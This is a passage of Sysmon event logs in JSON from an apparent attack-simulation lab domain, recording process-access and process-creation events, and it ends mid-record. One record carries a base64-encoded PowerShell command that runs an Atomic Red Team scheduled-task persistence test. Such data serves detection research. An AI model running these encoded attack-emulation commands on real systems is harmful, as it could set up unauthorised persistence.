{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5416,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.619\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.619","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5417,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.619\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.619","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5418,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.949\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001015000800}\r\nProcessId: 3788\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nParentProcessId: 4780\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.949","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001015000800}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","ParentProcessId":"4780","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5419,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nSourceProcessId: 4780\r\nSourceThreadId: 3028\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001001C00600}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffb5725b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01706b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa561|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefec4e6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8a19|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff85b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","SourceProcessId":"4780","SourceThreadId":"3028","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001001C00600}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffb5725b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ff01706b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa6d0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feffa561|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefec4e6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8a19|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff85b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8335|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+feff8006|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ffaa941b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fefb8b9c","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C2-5F25-0000-001001C00600}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C2-5F25-0000-001001C00600}","TargetProcessId":"3788","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.947","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.947\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 